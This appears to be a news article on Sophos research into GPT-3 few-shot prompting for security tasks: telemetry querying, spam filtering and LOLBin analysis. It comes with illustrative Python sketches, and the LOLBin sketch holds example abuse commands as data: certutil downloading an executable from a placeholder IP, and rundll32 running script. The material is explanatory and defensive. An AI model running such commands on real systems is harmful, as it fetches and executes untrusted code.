Sophos has released new research exploring how cybersecurity professionals can deploy the generative AI technology behind ChatGPT as a copilot to help fight malicious threats.
Sophos X-Ops researchers, including SophosAI principal data scientist Younghoo Lee, have been working on three prototype projects that show the potential of GPT-3 as an assistant to cybersecurity defenders.
All three use a technique called “few-shot learning” to train the AI model with just a few data samples, reducing the need to collect a large volume of pre-classified data.
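For readers unfamiliar with the technique, the sketch below shows the general shape of a few-shot prompt: a handful of labelled input/output pairs are placed directly in the prompt ahead of the new input, so no large pre-classified training set is needed. It uses the OpenAI Python client; the helper function, model name and example pairs are illustrative assumptions, not code from the Sophos report.

```python
# Minimal sketch of few-shot prompting: labelled examples are embedded in the
# prompt itself rather than used to train a model. Model name and helper are
# illustrative only.
from openai import OpenAI

client = OpenAI()  # expects OPENAI_API_KEY in the environment


def few_shot_complete(task: str, examples: list[tuple[str, str]], query: str) -> str:
    """Build a prompt from (input, output) example pairs and ask for the next output."""
    lines = [task, ""]
    for sample_input, sample_output in examples:
        lines += [f"Input: {sample_input}", f"Output: {sample_output}", ""]
    lines += [f"Input: {query}", "Output:"]

    response = client.chat.completions.create(
        model="gpt-3.5-turbo",            # illustrative; any GPT-3-class model
        messages=[{"role": "user", "content": "\n".join(lines)}],
        temperature=0,
        max_tokens=64,
    )
    return response.choices[0].message.content.strip()
```

The same pattern underpins each of the three prototypes described below, with only the task description and example pairs changing.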
Details of these projects are laid out in Sophos' latest report entitled “GPT for You and Me: Applying AI Language Processing to Cyber Defenses”. The report illustrates how GPT-3's large language models can be used to simplify the search for malicious activity in datasets from security software, more accurately filter spam, and speed up analysis of “living off the land” binary (LOLBin) attacks.
Since OpenAI unleashed ChatGPT in November, the security community has largely focused on the potential risks the new technology could bring: can the AI help wannabe attackers write malware or help cybercriminals write much more convincing phishing emails?
However, Sean Gallagher, principal threat researcher at Sophos, has a more optimistic view.
“At Sophos, we’ve long seen AI as an ally rather than an enemy for defenders, making it a cornerstone technology for Sophos, and GPT-3 is no different. The security community should be paying attention not just to the potential risks, but the potential opportunities GPT-3 brings.”
The first application Sophos tested with the few-shot learning method was a natural language query interface for sifting through malicious activity in security software telemetry.
Specifically, Sophos tested the model against its endpoint detection and response product. With this interface, defenders can filter through the telemetry with basic English commands, removing the need for defenders to understand SQL or a database’s underlying structure.
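A rough sketch of how such a natural-language query interface could be wired up with few-shot prompting is shown below. The telemetry schema, table and column names, and example question/query pairs are invented for illustration and are not taken from Sophos's implementation.

```python
# Hypothetical natural-language-to-query interface built on few-shot prompting.
# The schema, tables and columns below are invented for illustration.
from openai import OpenAI

client = OpenAI()

EXAMPLES = [
    ("show processes that spawned powershell in the last 24 hours",
     "SELECT * FROM process_events WHERE child_name = 'powershell.exe' "
     "AND timestamp > datetime('now', '-1 day');"),
    ("list machines that connected to 203.0.113.5",
     "SELECT DISTINCT hostname FROM network_events WHERE dest_ip = '203.0.113.5';"),
]


def english_to_query(question: str) -> str:
    """Translate a plain-English question into a SQL query via few-shot examples."""
    parts = ["Translate the question into a SQL query over the telemetry database.", ""]
    for q, sql in EXAMPLES:
        parts += [f"Question: {q}", f"SQL: {sql}", ""]
    parts += [f"Question: {question}", "SQL:"]

    response = client.chat.completions.create(
        model="gpt-3.5-turbo",      # illustrative model choice
        messages=[{"role": "user", "content": "\n".join(parts)}],
        temperature=0,
        max_tokens=120,
    )
    return response.choices[0].message.content.strip()


print(english_to_query("which hosts ran certutil this week?"))
```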
Next, Sophos tested a new spam filter using ChatGPT and found that, when compared to other machine learning models for spam filtering, the filter using GPT-3 was significantly more accurate.
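As an illustration of how a few-shot spam classifier might look in practice, the sketch below labels a message as spam or not spam using a handful of in-prompt examples. The model name and example messages are assumptions, and the prompt is not Sophos's actual filter; accuracy comparisons like those in the report would depend on the real evaluation data.

```python
# Rough sketch of a few-shot spam classifier; example messages and model name
# are illustrative only.
from openai import OpenAI

client = OpenAI()

LABELLED = [
    ("Your parcel is held at customs, pay the release fee here", "spam"),
    ("Minutes from yesterday's architecture review attached", "not spam"),
    ("Congratulations, you have been selected for a cash reward", "spam"),
]


def is_spam(message: str) -> bool:
    """Return True if the model labels the message as spam."""
    lines = ["Label each message as 'spam' or 'not spam'.", ""]
    for text, label in LABELLED:
        lines += [f"Message: {text}", f"Label: {label}", ""]
    lines += [f"Message: {message}", "Label:"]

    response = client.chat.completions.create(
        model="gpt-3.5-turbo",   # illustrative
        messages=[{"role": "user", "content": "\n".join(lines)}],
        temperature=0,
        max_tokens=3,
    )
    return response.choices[0].message.content.strip().lower().startswith("spam")
```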
Finally, Sophos researchers were able to create a program to simplify the process for reverse-engineering the command lines of LOLBins. Such reverse-engineering is notoriously difficult, but also critical for understanding LOLBins’ behaviour—and putting a stop to those types of attacks in the future.
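To make that concrete, the sketch below asks the model for a one-sentence, plain-English explanation of a suspicious command line, primed with a couple of well-documented LOLBin abuse patterns. It is an illustrative assumption of the workflow, not Sophos's analysis tool.

```python
# Illustrative only: ask the model to summarise what a suspicious
# living-off-the-land command line does, primed with known abuse patterns.
from openai import OpenAI

client = OpenAI()

EXAMPLES = [
    ("certutil -urlcache -split -f http://198.51.100.7/a.exe a.exe",
     "Abuses certutil to download a remote executable to disk."),
    ("rundll32 javascript:\"\\..\\mshtml,RunHTMLApplication\";alert(1)",
     "Abuses rundll32 to execute script content via mshtml."),
]


def explain_lolbin(command_line: str) -> str:
    """Produce a short plain-English explanation of a LOLBin command line."""
    parts = ["Explain in one sentence what each command line does.", ""]
    for cmd, explanation in EXAMPLES:
        parts += [f"Command: {cmd}", f"Explanation: {explanation}", ""]
    parts += [f"Command: {command_line}", "Explanation:"]

    response = client.chat.completions.create(
        model="gpt-3.5-turbo",   # illustrative
        messages=[{"role": "user", "content": "\n".join(parts)}],
        temperature=0,
        max_tokens=80,
    )
    return response.choices[0].message.content.strip()
```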
“One of the growing concerns within security operations centres is the sheer amount of ‘noise’ coming in. There are just too many notifications and detections to sort through, and many companies are dealing with limited resources,” said Gallagher.
“We’ve proved that, with something like GPT-3, we can simplify certain labour-intensive processes and give back valuable time to defenders.”
Sophos is already working to incorporate some of the prototypes into its products. The company has also made its results available on GitHub for those interested in testing GPT-3 in their own analysis environments.
“In the future, we believe that GPT-3 may very well become a standard co-pilot for security experts,” said Gallagher.